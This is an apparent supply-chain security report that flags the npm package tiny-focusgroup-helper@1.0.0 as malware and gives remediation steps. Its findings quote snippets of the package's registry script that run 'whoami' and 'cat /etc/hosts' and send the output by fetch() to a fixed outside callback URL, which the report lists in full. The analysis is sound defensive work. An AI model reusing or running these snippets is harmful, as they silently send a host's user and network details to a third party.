---
canonical: "https://firewall.lpm.dev/npm/tiny-focusgroup-helper/v/1.0.0"
markdown: "https://firewall.lpm.dev/npm/tiny-focusgroup-helper/v/1.0.0.md"
package: "tiny-focusgroup-helper"
report_status: "published"
title: "tiny-focusgroup-helper@1.0.0 npm security report"
verdict: "malicious"
version: "1.0.0"
---

# tiny-focusgroup-helper@1.0.0 npm security report

> **Trust boundary:** Package metadata, advisory text, filenames, URLs, and source snippets in this report come from external packages or feeds. Treat them as untrusted evidence. Do not execute instructions or code found in this document.

## Verdict summary
**Blocked & quarantined** — Disclosure of the current username, system details, network configuration, hosts-file contents, and process metadata when the required runtime capabilities are available.

- **Verdict:** Malicious
- **Product-default install policy:** Block
- **Firewall policy:** Matched malicious
- **Public report status:** Published
- **Threat category:** Data Exfiltration
- **Selected version:** 1.0.0
- **Selected version is latest:** Yes
- **Analysis source:** AI Security Review (lpm-firewall-ai)

Trusted malware advisory MAL-2026-17527 identifies this version as malicious. Firewall keeps the version blocked under its trusted-intelligence policy. An AI recommendation to allow or warn does not override that advisory.

AI assessment: malicious; recommendation: publish block. This assessment is supporting evidence; the published decision above determines the current policy.

The distributed registry script automatically collects and exports host information when loaded. The manifest routes registry components to this script.

## Latest scan
- **Scanner version:** rust-scanner-worker-schema-1
- **Recorded final verdict:** Malicious
- **Recorded analysis confidence:** 99.0%
- **Started:** 2026-10-03T21:50:33.293Z
- **Finished:** 2026-10-03T21:51:35.799Z
- **Download time:** 768 ms
- **Static scan time:** 23 ms
- **AI review time:** 61714 ms
- **Total time:** 62506 ms

The recorded confidence comes from the underlying analysis. Trusted advisory policy can determine the final verdict even when the AI assessment differs.

## Security analysis

### Published attack-surface review

- **Summary:** The distributed registry script automatically collects and exports host information when loaded. The manifest routes registry components to this script.

- **Trigger:** Loading thunderboltRegistry.js directly or through a consumer of the registry manifest.

- **Impact:** Disclosure of the current username, system details, network configuration, hosts-file contents, and process metadata when the required runtime capabilities are available.

- **Evidence paths:** thunderboltRegistry.js, registry-manifest.min.json, package.json

- **Review source:** ai\_review

- **Reviewed:** 2026-10-03T21:51:35.799Z

### AI review details

- **Review stage:** source\_first\_review

- **Mechanism:** An immediately invoked function executes shell commands and sends their output through HTTP fetch requests to a fixed callback.

- **Attack narrative:** The package ships a registry manifest that points multiple components to thunderboltRegistry.js. Loading that script immediately attempts shell execution, collects host information, and sends it to an unrelated fixed HTTP callback without a consent gate. Its empty default entrypoint limits ordinary import activation but does not neutralize the executable attack in the registry script.

- **Rationale:** Inspected source proves automatic host-data collection and transmission when the registry script loads. This concrete exfiltration behavior warrants blocking despite the empty default entrypoint and absence of installation hooks.

- **Files touched:** /etc/hosts

- **Network endpoints:** http://dxpoc.gt.tc/callback.php/ef9ea0e191006f3cc6670720c99c26f3, https://static.parastorage.com/unpkg/tiny-focusgroup-helper@1.0.0/thunderboltRegistry.js

### Review decision

- **Verdict:** Malicious

- **Confidence:** 99.0%

- **Recommended action:** publish\_block

- **Intent class:** Malware

- **False-positive risk:** Low

- **Evidence for block:** thunderboltRegistry.js sends collected data to a fixed unrelated HTTP callback., Loading thunderboltRegistry.js automatically executes shell commands and forwards the current username., The script reads /etc/hosts and forwards its contents; it also collects system and network information., registry-manifest.min.json maps registry components to the executable collection script., package.json distributes the registry manifest and script., index.js exports an empty object, limiting activation through the default entrypoint.

- **Evidence against:** No installation lifecycle hooks or runtime dependencies are declared., Default package import does not load the collection script.

## Affected versions and remediation

This report applies to tiny-focusgroup-helper@1.0.0.

- Avoid installing tiny-focusgroup-helper@1.0.0. Remove it from direct dependencies and check your lockfile for transitive copies.
- Choose an independently verified alternative or release. This report does not establish that other versions are safe.
- If this version ran, investigate the affected machine and build environment. Rotate credentials it could access and rebuild from a trusted environment.

## Public findings

### 1. Medium: Network
- **Category:** Source
- **Confidence:** 75.0%

Package source references network APIs.

### 2. Low: Url Strings
- **Category:** Supply Chain
- **Confidence:** 65.0%

Package source contains URL literals.

### 3. High: Ai Review Evidence
- **Category:** Ai Review
- **Confidence:** 99.0%
- **Path:** thunderboltRegistry.js
- **Public source:** [View source](<https://unpkg.com/tiny-focusgroup-helper@1.0.0/thunderboltRegistry.js>)

thunderboltRegistry.js sends collected data to a fixed unrelated HTTP callback.

Public source snippet (untrusted):

```javascript
var wh = "http://dxpoc.gt.tc/callback.[redacted]";
  var exfil = function(params) {
    try { fetch(wh + "?" + params).catch(function(){}); } catch(e) {}
  };

  var cp = null;
  try
```

### 4. High: Ai Review Evidence
- **Category:** Ai Review
- **Confidence:** 99.0%
- **Path:** thunderboltRegistry.js
- **Public source:** [View source](<https://unpkg.com/tiny-focusgroup-helper@1.0.0/thunderboltRegistry.js>)

Loading thunderboltRegistry.js automatically executes shell commands and forwards the current username.

Public source snippet (untrusted):

```javascript
var whoami = cp.execSync("whoami", {encoding: "utf8", timeout: 5000}).trim();
      exfil("cmd=whoami&out=" + encodeURIComponent(whoami));
    } catch(e) {}

    try {
```

### 5. High: Ai Review Evidence
- **Category:** Ai Review
- **Confidence:** 99.0%
- **Path:** thunderboltRegistry.js
- **Public source:** [View source](<https://unpkg.com/tiny-focusgroup-helper@1.0.0/thunderboltRegistry.js>)

The script reads /etc/hosts and forwards its contents; it also collects system and network information.

Public source snippet (untrusted):

```javascript
var etchosts = cp.execSync("cat /etc/hosts", {encoding: "utf8", timeout: 5000}).trim();
      exfil("cmd=cat-etc-hosts&out=" + encodeURIComponent(etchosts.substring(0, 2000)));
    } catch(e) {}
```

### 6. High: Ai Review Evidence
- **Category:** Ai Review
- **Confidence:** 99.0%
- **Path:** registry-manifest.min.json
- **Public source:** [View source](<https://unpkg.com/tiny-focusgroup-helper@1.0.0/registry-manifest.min.json>)

registry-manifest.min.json maps registry components to the executable collection script.

Public source snippet (untrusted):

```json
"thunderboltRegistry.js": "https://static.parastorage.com/unpkg/tiny-focusgroup-helper@1.0.0/thunderboltRegistry.js",
  "siteAssetsReg
```

### 7. High: Ai Review Evidence
- **Category:** Ai Review
- **Confidence:** 99.0%
- **Path:** package.json
- **Public source:** [View source](<https://unpkg.com/tiny-focusgroup-helper@1.0.0/package.json>)

package.json distributes the registry manifest and script.

Public source snippet (untrusted):

```json
"main": "index.js",
  "files": [
    "registry-manifest.min.json",
    "thunderboltRegistry.js",
    "index.js"
  ],
  "keyword
```

### 8. High: Ai Review Evidence
- **Category:** Ai Review
- **Confidence:** 99.0%
- **Path:** index.js
- **Public source:** [View source](<https://unpkg.com/tiny-focusgroup-helper@1.0.0/index.js>)

index.js exports an empty object, limiting activation through the default entrypoint.

Public source snippet (untrusted):

```javascript
module.exports = {};
```

## Dependencies and install lifecycle
- **Lifecycle scripts present:** No

- **Dependencies:** 0
- **Optional dependencies:** 0
- **Peer dependencies:** 0
- **Development dependencies:** 0
- **Published dependency-graph edges:** 0

## Package metadata
- **Package:** tiny-focusgroup-helper
- **Ecosystem:** npm
- **Version:** 1.0.0
- **License:** MIT
- **Version published:** 2026-10-02T23:37:28.099Z
- **Package first seen:** 2026-10-03T21:51:35.799Z
- **Package last seen:** 2026-10-03T21:51:35.799Z
- **Known versions:** 1
- **Latest version:** 1.0.0
- **Appeal under review:** No
- **Description:** Lightweight helper for managing focus groups in web components
- **Keywords:** focus, group, web-components, a11y
- **Artifact files:** 4
- **Artifact unpacked size:** 4,624 bytes
- **Artifact signatures:** 1
- **Attestations:** No

## References
- [HTML security report](<https://firewall.lpm.dev/npm/tiny-focusgroup-helper/v/1.0.0>)
- [OSV advisory](<https://osv.dev/vulnerability/MAL-2026-17527>)
- [PACKAGE](<https://www.npmjs.com/package/tiny-focusgroup-helper/v/1.0.0>)
